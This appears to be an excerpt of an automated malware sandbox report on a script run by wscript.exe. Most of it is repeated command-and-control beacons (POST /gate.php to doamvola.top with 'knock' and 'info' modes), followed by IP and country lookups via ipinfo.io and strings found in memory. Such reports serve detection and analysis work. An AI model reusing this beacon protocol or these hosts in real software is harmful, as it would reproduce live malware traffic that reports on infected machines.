Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json2[1].jsJump to behavior
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io
Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io
Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io
Source: wscript.exe, 00000000.00000002.3161161885.000000000465B000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com{=8 equals www.linkedin.com (Linkedin)
Source: wscript.exe, 00000000.00000002.3161408082.0000000005A90000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.3161488253.0000000005AA0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: wscript.exe, 00000000.00000002.3161161885.000000000465B000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: raw.githubusercontent.com
Source: unknownHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: wscript.exe, 00000000.00000002.3161150492.0000000004632000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
